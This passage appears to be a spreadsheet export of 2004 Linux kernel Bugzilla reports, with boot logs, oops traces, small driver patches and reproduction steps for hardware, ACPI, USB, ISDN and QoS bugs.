16 16:32:30 pvr kernel: usbcore: registered new driver usblp May 16 16:32:30 pvr kernel: drivers/usb/class/usblp.c: v0.13: USB Printer Device Class driver May 16 16:32:30 pvr kernel: Initializing USB Mass Storage driver... May 16 16:32:30 pvr kernel: usbcore: registered new driver usb-storage May 16 16:32:30 pvr kernel: USB Mass Storage support registered. May 16 16:32:30 pvr kernel: usbcore: registered new driver hid May 16 16:32:30 pvr kernel: drivers/usb/input/hid-core.c: v2.0:USB HID core driver May 16 16:32:30 pvr kernel: mice: PS/2 mouse device common for all mice May 16 16:32:30 pvr kernel: ts: Compaq touchscreen protocol output May 16 16:32:30 pvr kernel: input: PC Speaker May 16 16:32:30 pvr kernel: serio: i8042 AUX port at 0x60,0x64 irq 12 May 16 16:32:30 pvr kernel: usb 1-2: new high speed USB device using address 2 May 16 16:32:30 pvr kernel: input: ImPS/2 Generic Wheel Mouse on isa0060/serio1 May 16 16:32:30 pvr kernel: serio: i8042 KBD port at 0x60,0x64 irq 1 May 16 16:32:30 pvr kernel: input: AT Translated Set 2 keyboard on isa0060/serio0 May 16 16:32:30 pvr kernel: NET: Registered protocol family 2 May 16 16:32:30 pvr kernel: IP: routing cache hash table of 2048 buckets, 16Kbytes May 16 16:32:30 pvr kernel: TCP: Hash tables configured (established 16384 bind 16384) May 16 16:32:30 pvr kernel: NET: Registered protocol family 1 May 16 16:32:30 pvr kernel: NET: Registered protocol family 15 May 16 16:32:30 pvr kernel: ACPI: (supports S0 S1 S3 S4 S5) May 16 16:32:30 pvr kernel: found reiserfs format "3.6" with standard journal May 16 16:32:30 pvr kernel: reiserfs: using ordered data mode May 16 16:32:30 pvr kernel: Reiserfs journal params: device hda4, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 May 16 16:32:30 pvr kernel: reiserfs: checking transaction log (hda4) for (hda4) May 16 16:32:30 pvr kernel: Using r5 hash to sort names May 16 16:32:30 pvr kernel: VFS: Mounted root (reiserfs filesystem) readonly. May 16 16:32:30 pvr kernel: Mounted devfs on /dev May 16 16:32:30 pvr kernel: Freeing unused kernel memory: 168k freed May 16 16:32:30 pvr kernel: Adding 498004k swap on /dev/hda3. Priority:-1 extents:1 May 16 16:32:30 pvr kernel: Linux video capture interface: v1.00 May 16 16:32:30 pvr kernel: bttv: driver version 0.9.14 loaded May 16 16:32:30 pvr kernel: bttv: using 8 buffers with 2080k (520 pages) each for capture May 16 16:32:30 pvr kernel: bttv: Bt8xx card found (0). May 16 16:32:30 pvr kernel: bttv0: Bt878 (rev 17) at 0000:02:07.0, irq: 19, latency: 64, mmio: 0xec200000 May 16 16:32:30 pvr kernel: bttv0: detected: Pinnacle PCTV [card=39], PCI subsystem ID is 11bd:0012 May 16 16:32:30 pvr kernel: bttv0: using: Pinnacle PCTV Studio/Rave [card=39,autodetected] May 16 16:32:30 pvr kernel: bttv0: gpio: en=00000000, out=00000000 in=00ffffff [init] May 16 16:32:30 pvr kernel: bttv0: i2c: checking for MSP34xx @ 0x80... not found May 16 16:32:30 pvr kernel: bttv0: pinnacle/mt: id=1 info="PAL / mono" radio=no May 16 16:32:30 pvr kernel: bttv0: using tuner=33 May 16 16:32:30 pvr kernel: bttv0: i2c: checking for MSP34xx @ 0x80... not found May 16 16:32:30 pvr kernel: bttv0: i2c: checking for TDA9875 @ 0xb0... not found May 16 16:32:30 pvr kernel: bttv0: i2c: checking for TDA7432 @ 0x8a... not found May 16 16:32:30 pvr kernel: tda9887: chip found @ 0x86 May 16 16:32:30 pvr kernel: tuner: chip found at addr 0xc0 i2c-bus bt878 #0 [sw] May 16 16:32:30 pvr kernel: tuner: type set to 33 (MT20xx universal) by bt878 #0 [sw] May 16 16:32:30 pvr kernel: tuner: microtune: companycode=4d54 part=04 rev=04 May 16 16:32:30 pvr kernel: tuner: microtune MT2032 found, OK May 16 16:32:30 pvr kernel: bttv0: registered device video0 May 16 16:32:30 pvr kernel: bttv0: registered device vbi0 May 16 16:32:30 pvr kernel: bttv0: PLL: 28636363 =&gt; 35468950 .. ok May 16 16:32:30 pvr kernel: NTFS volume version 3.0. May 16 16:32:30 pvr kernel: ieee1394: Initialized config rom entry `ip1394' May 16 16:32:30 pvr kernel: ohci1394: $Rev: 1203 $ Ben Collins &lt;bcollins@debian.org&gt; May 16 16:32:30 pvr kernel: ohci1394: fw-host0: OHCI-1394 1.0 (PCI): IRQ=[18] MMIO=[ec111000-ec1117ff] Max Packet=[2048] May 16 16:32:30 pvr kernel: ieee1394: Host added: ID:BUS[0-00:1023] GUID[00301bb20000e420] May 16 16:32:30 pvr kernel: ip1394: $Rev: 1198 $ Ben Collins &lt;bcollins@debian.org&gt; May 16 16:32:30 pvr kernel: ip1394: eth1: IEEE-1394 IPv4 over 1394 Ethernet (fw-host0) May 16 16:32:30 pvr kernel: eth2: register usbnet at usb-0000:00:13.2-2, Netgear FA-120 USB Ethernet May 16 16:32:30 pvr kernel: usbcore: registered new driver usbnet May 16 16:32:30 pvr kernel: eth0: link up, 10Mbps, half-duplex, lpa 0x0000 May 16 16:32:30 pvr kernel: NET: Registered protocol family 17 May 16 16:32:30 pvr kernel: ip_tables: (C) 2000-2002 Netfilter core team May 16 16:32:30 pvr kernel: ip_conntrack version 2.1 (1783 buckets, 14264 max) - 300 bytes per conntrack ---- mencoder --version MEncoder 1.0pre3-3.3.3 (C) 2000-2003 MPlayer Team CPU: Intel Pentium 4/Xeon/Celeron Northwood 2863 MHz (Family: 8, Stepping: 9) Detected cache-line size is 64 bytes CPUflags: Type: 8 MMX: 1 MMX2: 1 3DNow: 0 3DNow2: 0 SSE: 1 SSE2: 1 Compiled for x86 CPU with extensions: MMX MMX2 SSE SSE2</t>
  </si>
  <si>
    <t>virtual console unusable</t>
  </si>
  <si>
    <t>2004-05-17 17:48 UTC</t>
  </si>
  <si>
    <t>jt holmes</t>
  </si>
  <si>
    <t>2005-08-31 01:14 UTC</t>
  </si>
  <si>
    <t>Distribution: RH9 Hardware Environment:tecra 8100 Software Environment: Problem Description: Just as the boot message Console: Switching to colour frame buffer ... appears what was normally a 640x800 reverse video window becomes many vertical mixed color bars and you cannot see any text. Left alone to continue to boot and knowing when the Login: prompt has probably been displayed, I login blind and init 5 and X comes up and works fine. I see that vt.c had several changes between 2.6.5 and 2.6.6 but can't tell where the problem is. I always use whole number releases i.e. 2.6.5 2.6.6 thanks Steps to reproduce:</t>
  </si>
  <si>
    <t>Chris Mason</t>
  </si>
  <si>
    <t>power-management_other</t>
  </si>
  <si>
    <t>irq 18: nobody cared! - Intel 875P, NVIDIA</t>
  </si>
  <si>
    <t>2004-05-20 13:03 UTC</t>
  </si>
  <si>
    <t>Johann Glaser</t>
  </si>
  <si>
    <t>2004-11-30 22:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: ASUS P4C800 Deluxe Mainboard, P4-2.8GHz (HT), nVidia GeForce FX 5200, 1GB RAM, Software Environment: Debian unstable, glibc 2.3.2, gcc 3.3, GNOME 2.6 Problem Description: Since I updated to Kernel 2.6.4 the kernel reports periodically the message: Message from syslogd@hansi at Thu May 20 21:48:59 2004 ... hansi kernel: Disabling IRQ #18 and beeps at every Eterm I'm running. When looking into dmesg the following message appears --- snip --- irq 18: nobody cared! Call Trace: [&lt;c01065cc&gt;] __report_bad_irq+0x2a/0x8b [&lt;c01066b6&gt;] note_interrupt+0x6f/0x9f [&lt;c0106ac7&gt;] do_IRQ+0x1c1/0x229 [&lt;c0104c54&gt;] common_interrupt+0x18/0x20 [&lt;c010201e&gt;] default_idle+0x0/0x2c [&lt;c03c007b&gt;] match+0x277/0x34c [&lt;c0102047&gt;] default_idle+0x29/0x2c [&lt;c01020b0&gt;] cpu_idle+0x33/0x3c [&lt;c01fb407&gt;] vscnprintf+0x2b/0x3b [&lt;c0120959&gt;] printk+0x1ff/0x2ac handlers: [&lt;c02aa306&gt;] (ide_intr+0x0/0x324) [&lt;c02f7504&gt;] (usb_hcd_irq+0x0/0x67) Disabling IRQ #18 --- snap --- The bottom few lines of the call trace vary from time to time. Kernel 2.6.4, 2.6.5 and 2.6.6 have this behaviour. These messages come in very periodically. Currently the distance is exactly 65 seconds. A few months ago (using 2.6.4) the distance was 120s. /proc/interrupts: CPU0 CPU1 0: 1028012 1203318 IO-APIC-edge timer 8: 4 0 IO-APIC-edge rtc 9: 0 0 IO-APIC-level acpi 14: 23 0 IO-APIC-edge ide0 16: 162976 0 IO-APIC-level uhci_hcd, uhci_hcd, nvidia 17: 1684705 1587000 IO-APIC-level Intel ICH5 18: 278708 3021429 IO-APIC-level ide2, uhci_hcd 19: 0 0 IO-APIC-level uhci_hcd 20: 3 0 IO-APIC-level ohci1394 21: 156 0 IO-APIC-level aic7xxx 22: 13168 0 IO-APIC-level SysKonnect SK-98xx NMI: 0 0 LOC: 2231222 2231427 ERR: 0 MIS: 19 There are some similar bugs in the database but none has the same behaviour than at my machine. It seems that these messages don't appear when no X-Windows is running. Oddly enough, when there is lots of disk IO ("updatedb"), no such messages apperas. As soon as updatedb finished, another such message appeared. When high processing load is going on (without any disk IO, like an endless loop), no messages appear too. I'll attach a few files with output of some system tools / /proc files.</t>
  </si>
  <si>
    <t>rajeev</t>
  </si>
  <si>
    <t>unload "button" module -&gt; "kernel BUG"</t>
  </si>
  <si>
    <t>2004-05-21 06:12 UTC</t>
  </si>
  <si>
    <t>David Eriksson</t>
  </si>
  <si>
    <t>2004-11-04 13:11 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: IBM ThinkPad T30 (See http://www.2good.nu/thinkpad_t30_fc2/ for details.) Software Environment: kernel-2.6.5-1.358 Problem Description: I was having the same problem as http://bugzilla.kernel.org/show_bug.cgi?id=2643 and as hinted in that bug there are problems when unloading the "button" module: May 21 14:56:51 zion kernel: ------------[ cut here ]------------ May 21 14:56:51 zion kernel: kernel BUG at fs/proc/generic.c:685! May 21 14:56:51 zion kernel: invalid operand: 0000 [#1] May 21 14:56:51 zion kernel: CPU: 0 May 21 14:56:51 zion kernel: EIP: 0060:[&lt;02167496&gt;] Not tainted May 21 14:56:51 zion kernel: EFLAGS: 00010202 (2.6.5-1.358) May 21 14:56:51 zion kernel: EIP is at remove_proc_entry+0x92/0xe4 May 21 14:56:51 zion kernel: eax: 21f30284 ebx: 228505f5 ecx: 00000000 edx: 21f19590 May 21 14:56:51 zion kernel: esi: 21f195c4 edi: 208b2190 ebp: 00000006 esp: 0acabf50 May 21 14:56:51 zion kernel: ds: 007b es: 007b ss: 0068 May 21 14:56:51 zion kernel: Process rmmod (pid: 4587, threadinfo=0acab000 task=1007f6b0) May 21 14:56:51 zion kernel: Stack: 21f19590 228505f5 22850f80 022c997c 00000000 0acab000 228504b2 02126b19 May 21 14:56:51 zion kernel: 00000000 74747562 1f006e6f 00000246 00000000 1f283d00 f7034000 1f283d00 May 21 14:56:51 zion kernel: 02137c1f 0aeb5444 f7035000 02137f64 0911e744 1f283d00 0acabfc0 00000004 May 21 14:56:51 zion kernel: Call Trace: May 21 14:56:51 zion kernel: [&lt;228504b2&gt;] acpi_button_exit+0x1a/0x1b [button] May 21 14:56:51 zion kernel: [&lt;02126b19&gt;] sys_delete_module+0x122/0x162 May 21 14:56:51 zion kernel: [&lt;02137c1f&gt;] unmap_vma_list+0xe/0x17 May 21 14:56:51 zion kernel: [&lt;02137f64&gt;] do_munmap+0xfe/0x108 May 21 14:56:51 zion kernel: [&lt;02114408&gt;] do_page_fault+0x0/0x446 May 21 14:56:51 zion kernel: May 21 14:56:51 zion kernel: Code: 0f 0b ad 02 8d 5e 29 02 8b 47 44 85 c0 75 09 89 f8 e8 21 Steps to reproduce: Running this command as root: rmmod button</t>
  </si>
  <si>
    <t>Missing locks in video1394_ioctl</t>
  </si>
  <si>
    <t>2004-05-22 04:01 UTC</t>
  </si>
  <si>
    <t>2006-08-01 12:41 UTC</t>
  </si>
  <si>
    <t>Stefan Richter</t>
  </si>
  <si>
    <t>This bug was reported at http://bugs.debian.org/248996. The last few messages are: video1394_0: Iso receive DMA: 8 buffers of size 614400 allocated for a frame sis video1394_0: iso context 1 listen on channel 0 video1394_0: Waking up iso dma ctx=1 video1394_0: Buffer 3 is already used video1394_0: Iso context 1 stop talking on channel 0 NMI Watchdog detected LOCKUP on CPU1, eip c02920f0, registers: CPU: 1 EIP: 0060:[&lt;c02920f0&gt;] Not tainted EFLAGS: 00200086 (2.6.6-1-686-smp) EIP is at .text.lock.sched+0x34/0xa4 eax: 00000000 ebx: f3106000 ecx: c1813be0 edx: f3106000 esi: f3c49edc edi: 00200286 ebp: f3107ed0 esp: f3107ea4 ds: 007b es: 007b ss: 0068 Process Simulation_trac (pid: 2218, threadinfo=f3106000 task=f77ba0d0) Stack: 00000000 f77ba0d0 c011bb60 f3c49ee0 f3c49ee0 c01b48c2 f3107f44 bf5ffa84 f3106000 f3c49e48 f3106000 00200297 f8aafbcd f77f7a20 00000001 00000000 f77ba0d0 c011bb60 00000000 00000000 f77515b8 f77ba5f4 f3107fc4 f3c49edc Call Trace: [&lt;c011bb60&gt;] default_wake_function+0x0/0x20 [&lt;c01b48c2&gt;] copy_from_user+0x42/0x70 [&lt;f8aafbcd&gt;] video1394_ioctl+0xacd/0x1070 [video1394] [&lt;c011bb60&gt;] default_wake_function+0x0/0x20 [&lt;c010dc66&gt;] convert_fxsr_from_user+0x26/0xf0 [&lt;c01e4f8e&gt;] tty_write+0x19e/0x2f0 [&lt;c01eab80&gt;] write_chan+0x0/0x230 [&lt;c015d7b7&gt;] vfs_write+0x107/0x160 [&lt;c0171c08&gt;] sys_ioctl+0x148/0x2d0 [&lt;c0102313&gt;] huft_build+0x1d3/0x540 [&lt;c010621b&gt;] syscall_call+0x7/0xb [&lt;c0102313&gt;] huft_build+0x1d3/0x540 Code: 80 3e 00 7e f9 e9 9e fb ff ff f3 90 80 3e 00 7e f9 e9 11 fc console shuts up ... So it looks like someone did a WAIT/POLL BUFFER which sleeps without holding a lock on d, and then someone did a UNLISTEN/UNTALK CHANNEL, which frees d...</t>
  </si>
  <si>
    <t>S3 wakeup hangs, S1 works - VIA KT400A</t>
  </si>
  <si>
    <t>2004-05-22 06:52 UTC</t>
  </si>
  <si>
    <t>Claas Langbehn</t>
  </si>
  <si>
    <t>2004-11-07 11:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo x86 Hardware Environment: EPOX 8K9A9I, Athlon XP1800+ Software Environment: Kernel 2.6.6 Problem Description: I can send the system to sleep with "echo mem &gt; /sys/power/state". This looks good so far. But when I want to wake the machine up (by pressing a key on my non-USB-keyboard), it freezes at the end. On the screen I get this: (VGA-BIOS showing up - Nvidia FX 5200) Back to C! MCE: The hardware reports a non fatal, correctable incident occured on CPU 0. Bank 1: f600000000000181 MCE: The hardware reports a non fatal, correctable incident occured on CPU 0. Bank 2: f6000000000201fe MCE: The hardware reports a non fatal, correctable incident occured on CPU 0. Bank 3: f60000000000bffe PM: Finishing up. Now the system is frozen. The picture is still there, but the keyboard is dead. Also the built in Via-Network is dead. Is there a way to check if it is really dead? I did my test with all services stopped and all modules unloaded. Plain 2.6.6 seems to wake up a bit further than 2.6.6-bk8. But both show the same symptoms. Besides, S1 (standby) works like a charm, waking up within 2-3 seconds. Steps to reproduce: echo mem &gt; /sys/power/state press a key</t>
  </si>
  <si>
    <t>speedstep-centrino oopses on Asus M2400N w/ kernel 2.6.6</t>
  </si>
  <si>
    <t>2004-05-22 16:54 UTC</t>
  </si>
  <si>
    <t>Jochen Schulz</t>
  </si>
  <si>
    <t>2004-11-04 13:29 UTC</t>
  </si>
  <si>
    <t>2781 2843</t>
  </si>
  <si>
    <t>Distribution: Debian/sid Hardware Environment: Asus M2400N (Pentium M 1.3GHz) Software Environment: Debian kernel-image-2.6.6-1-686 &amp; vanilla 2.6.6 Problem Description: When compiling a custom kernel v2.6.6 with cpufreq support and speedstep-centrino=y (which works like a charm with previous kernel versions), my machine panics at boot time. I was not able to transcribe the whole call trace from the screen because I couldn't scroll up. Today I installed the package kernel-image-2.6.6-1.686 (config attached) from Debian unstable which comes with cpufreq compiled as module. The machine booted up just fine, but without cpufreq support. modprobing speedstep_centrino resulted in a kernel oops and a hanging machine. I tried to shut down using the power button, but that failed, too. Luckily, this time the oops made it to syslog (attached). Steps to reproduce: Compile 2.6.6 w/ attached config (esp. CONFIG_X86_SPEEDSTEP_CENTRINO=y) and boot on Asus M2400N.</t>
  </si>
  <si>
    <t>[patch] radeonfb powerdown doesn't work</t>
  </si>
  <si>
    <t>2.6.4 and 2.6.6</t>
  </si>
  <si>
    <t>2004-05-23 06:37 UTC</t>
  </si>
  <si>
    <t>2005-08-15 17:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: 0000:01:00.0 VGA compatible controller: ATI Technologies Inc Radeon RV200 QW [Radeon 7500] (prog-if 00 [VGA]) Subsystem: Giga-byte Technology RV200 QW [RADEON 7500 PRO MAYA AR] Flags: bus master, stepping, 66MHz, medium devsel, latency 32, IRQ 10 Memory at d0000000 (32-bit, prefetchable) I/O ports at 9000 [size=256] Memory at dd000000 (32-bit, non-prefetchable) [size=64K] Capabilities: &lt;available only to root&gt; Software Environment: radeonfb: Found Intel x86 BIOS ROM Image radeonfb: Retreived PLL infos from BIOS radeonfb: Reference=27.00 MHz (RefDiv=12) Memory=256.00 Mhz, System=160.00 MHz radeonfb: Monitor 1 type CRT found radeonfb: EDID probed radeonfb: Monitor 2 type no found EDID checksum failed, aborting EDID checksum failed, aborting radeonfb: ATI Radeon QW SDR SGRAM 64 MB Problem Description: When I switch the computer to standby with echo -n standby &gt; /sys/power/state the radeonfb driver tells me its suspending to state 1 but the display does not get turned off. It turns out to be a small typo in drivers/video/aty/radeon_pm.c (see patch below). The box I tested it on is running kernel 2.6.4 but it looks like it's still there in 2.6.6. The patch is against 2.6.6. --- kernel-source-2.6.6/drivers/video/aty/radeon_pm.c~ 2004-02-19 09:55:25.000000000 +0100 +++ kernel-source-2.6.6/drivers/video/aty/radeon_pm.c 2004-05-23 15:25:35.000000000 +0200 @@ -867,7 +867,7 @@ } /* Blank display and LCD */ - radeonfb_blank(VESA_POWERDOWN+1, info); + radeonfb_blank(VESA_POWERDOWN, info); /* Sleep */ rinfo-&gt;asleep = 1; Steps to reproduce:</t>
  </si>
  <si>
    <t>/dev/isdninfo does no longer exist at 2.6.x Kernels, but needed by my isdncard Teles 16.3 (non PnP)</t>
  </si>
  <si>
    <t>2004-05-23 13:21 UTC</t>
  </si>
  <si>
    <t>Sascha Wuestemann</t>
  </si>
  <si>
    <t>2004-12-20 10:22 UTC</t>
  </si>
  <si>
    <t>Distribution:GentoGentoo 1.4 rc1-rc2o 1.4 rc1-rc2 Hardware Environment:x86, Host bridge: Intel Corp. 430TX - 82439TX MTXC (rev 01), ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 01), Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 01), Teles 16.3 (non PnP) which is type=3 for hisax Software Environment:gcc (GCC) 3.3.3 20040412 (Gentoo Hardened Linux 3.3.3-r3, ssp-3.3-7, pie-8.5.3), isdn4k-utils v3.2_p1-r4 Problem Description: Kernel prior to 2.6.x I have used (2.4.x) used to have /dev/isdninfo which is needed by isdnctrl e.g. to dialout to internet service providers or e.g. to convert incoming calling numbers to names. With 2.6.x kernels /dev/isdninfo is lost so e.g. I can't dialout anymore. Steps to reproduce: Using a 2.6.x kernel (tested 2.6.2, 2.6.3, 2.6.4, 2.6.5) My comments: I am using german isdn. I wonder why /dev/isdninfo is lost and so far I have not noticed anybody cares about. BTW: I have to use the "Old ISDN4Linux" tree with the following options: CONFIG_ISDN=m CONFIG_ISDN_I4L=m CONFIG_ISDN_PPP=y CONFIG_ISDN_PPP_VJ=y CONFIG_ISDN_MPP=y CONFIG_IPPP_FILTER=y CONFIG_ISDN_PPP_BSDCOMP=m CONFIG_ISDN_AUDIO=y CONFIG_ISDN_TTY_FAX=y CONFIG_ISDN_DRV_LOOP=m CONFIG_ISDN_DRV_HISAX=m CONFIG_HISAX_EURO=y CONFIG_DE_AOC=y CONFIG_HISAX_MAX_CARDS=1 CONFIG_HISAX_16_3=y At least a comment for the reason is appreciated, if there would be a possibility to enrich my system with a functional /dev/isdninfo I would be happy. :-) regars, Sascha</t>
  </si>
  <si>
    <t>Jeff Mahoney</t>
  </si>
  <si>
    <t>QoS hangs when inserting an invaid ip filter</t>
  </si>
  <si>
    <t>2.4.25 and 2.6.4</t>
  </si>
  <si>
    <t>2004-05-24 03:02 UTC</t>
  </si>
  <si>
    <t>Jaume Catarineu</t>
  </si>
  <si>
    <t>2005-02-17 13:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake-10-Community &amp; RedHat 9 Hardware Environment: i386 (AMD and Pentium) Software Environment: the standard linux systems 1) Linux version 2.4.25 (root@servidor) (gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)) #2 Tue Mar 23 19:36:49 CET 2004 2) Linux version 2.6.4 (root@Amadeus) (gcc version 3.3.2 (Mandrake Linux 10.0 3.3.2-6mdk)) #1 Tue Mar 23 01:52:21 GMT 2004 --Problem Description: When writting an ip filter, a segmentation fault is generated and that part of the kernel (the QoS) seems to be unusuable after that. Then, even the system reboot process hangs. --Steps to reproduce: The following program produces the segmentation fault: tc qdisc add dev lo root handle 1: tbf rate 250kbit burst 5k limit 5k tc qdisc add dev lo parent 1: handle 20: prio tc qdisc add dev lo parent 20:1 handle 210: sfq perturb 10 tc qdisc add dev lo parent 20:2 handle 220: tbf rate 250kbit burst 5k \ limit 5k tc qdisc add dev lo parent 20:3 handle 230: sfq perturb 10 tc filter add dev lo protocol ip parent 1:0 prio 1 handle 2 \ fw flowid 20:3</t>
  </si>
  <si>
    <t>floppy.c: major-minor does not change, minor always 0; floppy=nil, floppy1 only valid device</t>
  </si>
  <si>
    <t>2.6.6-bk3</t>
  </si>
  <si>
    <t>2004-05-25 19:20 UTC</t>
  </si>
  <si>
    <t>2004-07-15 20:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: i586, K6-2 450MHz cpu, 256 MB RAM, 1.44 &amp; 1.2 MB floppy Software Environment: console/X Problem Description: Get the following error message when trying to mount floppy: # mount /dev/fd0 /mnt/floppy mount: /dev/fd0 is not a valid block device Steps to reproduce: 1. Copy config-2.6.5-3 from FC2 to .config 2. make xconfig 3. Enable and 100% soundblaster compatibles support and AWE32 synth as modules in OSS sound modules 3. make bzImage, modules, module_install and install 4. Reboot 5. login as root 6. Open console and enter following command # mount /dev/df0 /mnt/floppy System does not have problem accessing floppy using version 2.6.5-1.358 that comes with FC2.</t>
  </si>
  <si>
    <t>USB and PS/2 keyboard at boot, PS/2 does not initialize</t>
  </si>
  <si>
    <t>2004-05-26 08:17 UTC</t>
  </si>
  <si>
    <t>2006-04-22 05:46 UTC</t>
  </si>
  <si>
    <t>I have two keyboards, one USB on PS/2. Plug one or the other in and system works fine. Plug in PS/2, boot, plug in USB, works fine. Plug in PS/2 and USB, boot, PS/2 does not initialize. I have tried this with several keyboards and it always happens. This broke in 2.6.5-rc2. I reported it to lkml then too. I needed to backout this change to make my PS/2 keyboard work again. Without this change atkbd.c gets zeros back from the keyboard during probe and won't recognize it. ===== serio.c 1.25 vs edited ===== --- 1.25/drivers/input/serio/serio.c Wed Mar 3 05:50:17 2004 +++ edited/serio.c Mon Mar 22 22:54:36 2004 @@ -195,9 +195,6 @@ ret = serio-&gt;dev-&gt;interrupt(serio, data, flags, regs); } else { if (!flags) { - if ((serio-&gt;type == SERIO_8042 || - serio-&gt;type == SERIO_8042_XL) &amp;&amp; (data != 0xaa)) - return ret; serio_rescan(serio); ret = IRQ_HANDLED; }</t>
  </si>
  <si>
    <t>System noise when using kernel 2.6</t>
  </si>
  <si>
    <t>Kernel 2.6 series</t>
  </si>
  <si>
    <t>2004-05-28 12:31 UTC</t>
  </si>
  <si>
    <t>Anssi Hannula</t>
  </si>
  <si>
    <t>2005-11-16 14:05 UTC</t>
  </si>
  <si>
    <t>timers_interval-timers</t>
  </si>
  <si>
    <t>Distribution: No distribution Hardware Environment: HP Omnibook 5700CTX notebook, 166MHz Pentium MMX with Opti Viper mainboard. Software Environment: Vanilla kernels in 2.6 series. Problem Description: When using 2.6 series kernels, the notebook makes a very high-pitch sound. Similar sound comes when using BIOS setup's "CPU Power saving" feature, and apparently in bug #2478, so I suspect this has something to do with power management. Compiling kernel without power management / ACPI / APM doesn't help. In fact, I tried to strip the kernel to absolute minimum, but the sound didn't disappear. There is no such sound in kernel 2.4 series or in other OS. Steps to reproduce: Use a 2.6 series kernel on HP Omnibook 5700CTX notebook.</t>
  </si>
  <si>
    <t>Missing pop-off in arch/i386/kernel/acpi/wakeup.S</t>
  </si>
  <si>
    <t>2004-05-28 19:07 UTC</t>
  </si>
  <si>
    <t>NIIBE Yutaka</t>
  </si>
  <si>
    <t>2004-06-29 19:31 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel OOPS when acpi_enter_sleep_state fails There is a missing pop-off after call of acpi_enter_sleep_state. On success, acpi_enter_sleep_state never returns, but on failure, it will cause kernel OOPS. Here is a patch. diff -ruNp linux-2.6.6/arch/i386/kernel/acpi/wakeup.S linux-2.6.6-gniibe/arch/i386/kernel/acpi/wakeup.S --- linux-2.6.6/arch/i386/kernel/acpi/wakeup.S 2004-05-10 11:32:02.000000000 +0900 +++ linux-2.6.6-gniibe/arch/i386/kernel/acpi/wakeup.S 2004-05-29 10:19:34.000000000 +0900 @@ -270,6 +270,7 @@ ENTRY(do_suspend_lowlevel) call save_registers pushl $3 call acpi_enter_sleep_state + addl $4,%esp ret .p2align 4,,7 ret_point:</t>
  </si>
  <si>
    <t>Kernel panic on boot: Attempted to kill the idle task!</t>
  </si>
  <si>
    <t>2004-05-29 14:42 UTC</t>
  </si>
  <si>
    <t>Steve Alexander</t>
  </si>
  <si>
    <t>2004-07-31 09:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Fujitsu Lifebook P5020D Software Environment: I can't boot into the kernel I'm reporting a bug against. Here's the output of running the ver_linux script against 2.6.6-rc2-mm1 in the same environment. zeus3:/usr/src/linux/scripts# ./ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux zeus3 2.6.6-rc2-mm1 #1 Thu Apr 22 18:33:33 EEST 2004 i686 GNU/Linux Gnu C 3.0.4 Gnu make 3.79.1 binutils 2.14.90.0.7 util-linux 2.11n mount 2.12 module-init-tools 3.0-pre5 e2fsprogs 1.35-WIP pcmcia-cs 3.2.5 PPP 2.4.1 nfs-utils 1.0 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.14 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.0.91 Modules Loaded md5 ipv6 joydev psmouse rfcomm l2cap bluetooth ds yenta_socket pcmcia_core irda snd_intel8x0 snd_ac97_codec snd_pcm snd_timer snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore ohci_hcd ehci_hcd ath_pci wlan ath_hal uhci_hcd usbcore intel_agp i830 agpgart 8139too crc32 mii af_packet rtc unix Problem Description: On booting into this kernel I immediately get the panic. Steps to reproduce: 1. compile kernel 2. install 3. reboot Here's the output of ksymoops: ksymoops 2.4.5 on i686 2.6.6-rc2-mm1. Options used -v /usr/src/linux/vmlinux (specified) -K (specified) -l /proc/modules (default) -o /lib/modules/2.6.6-rc2-mm1/ (default) -m /boot/System.map-2.6.7-rc1 (specified) No modules in ksyms, skipping objects No ksyms, skipping lsmod eax: df6bbe57 ebx: d78f5668 ecx: 000000b2 edx: 40b8fa83 esi: df6d9400 edi: 00000000 ebp: 00000000 esp: c0367f7c ds: 007b es: 007b ss: 0068 Stack: c0168ead df6d9400 00000000 c0156ff3 df6bd480 fffffff4 c02f7920 c02aa384 c015705e c0186e80 00000000 00000000 0009f700 c038f5e0 003d9007 c01570dd 00000000 c0377b2f 00000200 c0377580 0001eba9 c03771eb 00042000 c01514c0 [&lt;c0186ead&gt;] sysfs_fill_super+0xd2/0xa0 [&lt;c0156ff3&gt;] get_sb_single+0x63/0x90 [&lt;c015705e&gt;] do_kern_mount+0x3e/0xb0 [&lt;c0186e80&gt;] sysfs_fill_super+0x0/0xa0 [&lt;c01570dd&gt;] kern_mount+0xd/0xf [&lt;c0377b2f&gt;] sysfs_init+0x1f/0x50 [&lt;c0377580&gt;] mnt_init+0xa0/0xc0 [&lt;c03771eb&gt;] vfs_caches_init+0x7b/0x90 [&lt;c01514c0&gt;] flip_ctor+0x0/0x30 [&lt;c01514f0&gt;] flip_dtor+0x0/0x30 [&lt;c03685cd&gt;] start_kernel+0x12d/0x1b0 Code: c0 14 57 2f c0 00 00 00 00 00 10 00 00 00 00 00 00 0c 00 00 Using defaults from ksymoops -t elf32-i386 -a i386 &gt;&gt;eax; df6bbe57 &lt;__crc___print_symbol+af230/19b86e&gt; &gt;&gt;ebx; d78f5668 &lt;__crc_invalidate_bdev+12a226/1ea5c0&gt; &gt;&gt;edx; 40b8fa83 &lt;__crc_blk_rq_bio_prep+12a8c5/2c8b0d&gt; &gt;&gt;esi; df6d9400 &lt;__crc___print_symbol+cc7d9/19b86e&gt; &gt;&gt;esp; c0367f7c &lt;init_thread_union+1f7c/2000&gt; Code; 00000000 Before first symbol 00000000 &lt;_EIP&gt;: Code; 00000000 Before first symbol 0: c0 14 57 2f rclb $0x2f,(%edi,%edx,2) Code; 00000004 Before first symbol 4: c0 00 00 rolb $0x0,(%eax) Code; 00000007 Before first symbol 7: 00 00 add %al,(%eax) Code; 00000009 Before first symbol 9: 00 